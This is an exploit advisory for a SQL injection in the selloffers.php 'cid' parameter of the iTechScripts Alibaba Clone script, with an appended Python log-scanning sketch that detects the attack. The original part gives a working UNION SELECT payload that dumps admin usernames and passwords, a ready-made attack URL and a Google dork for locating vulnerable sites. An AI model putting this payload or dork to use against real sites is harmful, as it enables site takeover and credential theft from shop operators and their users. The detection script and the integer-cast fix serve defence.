-----------------------------------------------------------------------

iTechScripts Alibaba Clone (selloffers.php) SQL Injection Vulnerability

-----------------------------------------------------------------------

Author  	: v3n0m

Site    	: http://yogyacarderlink.web.id/

Date		: November, 16-2010

Location	: Jakarta, Indonesia

Time Zone	: GMT +7:00



Application	: Alibaba Clone

Price		: $199.00

Vendor  	: http://itechscripts.com/

Google Dork	: "Powered by iTechScripts"



Exploit & p0c

_____________



-9999+union+select+all+1,group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin--



http://127.0.0.1/[path]/selloffers.php?cid=[SQLi]

http://127.0.0.1/[path]/selloffers.php?cid=-9999+union+select+all+1,group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin--
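
Detection sketch for the request shown above. This is an added example, not part of the original advisory or the vendor's code. It flags selloffers.php requests whose cid value is not a plain integer; the combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-log-format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL tokens that appear in the advisory's payload.
SQL_TOKENS = re.compile(r'\b(union|select|group_concat|from)\b|--', re.I)

# Constructed sample lines: documentation IPs and made-up timestamps/sizes.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Nov/2010:10:00:01 +0700] "GET /shop/selloffers.php?cid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Nov/2010:10:00:05 +0700] "GET /shop/selloffers.php?cid=-9999+union+select+all+1,'
    'group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin-- HTTP/1.1" 200 811',
    '203.0.113.9 - - [16/Nov/2010:10:00:09 +0700] "GET /shop/selloffers.php?cid=12%27 HTTP/1.1" 200 300',
    '203.0.113.7 - - [16/Nov/2010:10:00:12 +0700] "GET /shop/index.php?cid=abc HTTP/1.1" 200 100',
]

def check_line(line):
    """Return (cid, reason) for a suspicious selloffers.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/selloffers.php"):
        return None
    # parse_qs decodes %xx and '+', so encoded payloads are normalised first.
    for cid in parse_qs(url.query, keep_blank_values=True).get("cid", []):
        if SQL_TOKENS.search(cid):
            return cid, "sql-keywords"
        if not re.fullmatch(r"\d{1,10}", cid):
            return cid, "non-numeric"
    return None

def scan(lines):
    """Return [(line_number, reason, decoded_cid)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = check_line(line)
        if result:
            hits.append((n, result[1], result[0]))
    return hits

if __name__ == "__main__":
    for n, reason, cid in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}: cid={cid!r}")
```

The same integer-only rule belongs in the application: cast cid to an integer or bind it in a prepared statement before it reaches the query.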



ShoutZ

______



All YOGYACARDERLINK CREW, GheMaX, LeQhi

Also Jovita & Fabian :)